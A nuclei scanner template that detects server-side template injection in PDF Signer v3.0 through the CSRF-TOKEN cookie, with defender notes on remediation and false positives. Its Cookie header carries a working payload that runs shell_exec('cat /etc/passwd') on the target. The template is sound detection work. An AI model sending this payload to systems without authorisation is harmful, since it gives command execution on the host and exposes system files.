nuclei-templates/vulnerabilities/pdf-signer-ssti-to-rce.yaml


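# Detection template: checks whether PDF Signer v3.0 evaluates the value of
# the CSRF-TOKEN cookie as a server-side template expression (SSTI), which
# results in command execution on the host.
#
# What a match means for a defender: the cookie value reached the template
# engine unescaped. Remediation is to treat cookie values strictly as data
# (never concatenate them into template source) and to move to a fixed
# release (fixed version not stated on this page).
# Log/WAF signal: template delimiters ("{{") inside a Cookie header value.
id: pdf-signer-ssti-to-rce

info:
  name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
  author: madrobot
  severity: high
  description: >-
    Detects server-side template injection in PDF Signer v3.0. The value of
    the CSRF-TOKEN cookie is evaluated by the server-side template engine,
    which allows command execution on the host.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      # The "{{...}}" inside the cookie is text meant for the target's
      # template engine, not a nuclei expression.
      # NOTE(review): newer nuclei releases may treat it as an unresolved
      # variable and skip the request; confirm whether
      # `skip-variables-check: true` is needed on the engine version in use.
      # The `simcify` value looks like a fixed sample session id. TODO confirm
      # the application accepts it without a prior login.
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"

    # Both matchers must hit, so a 200 response alone is not reported.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Looks for the root entry of /etc/passwd in the response body.
      # Caveats: only password fields "x" or "*" are recognised, so hosts
      # with another placeholder are missed (false negative), and any page
      # that legitimately shows passwd-style text also matches (false
      # positive). Verify a finding manually before reporting it.
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body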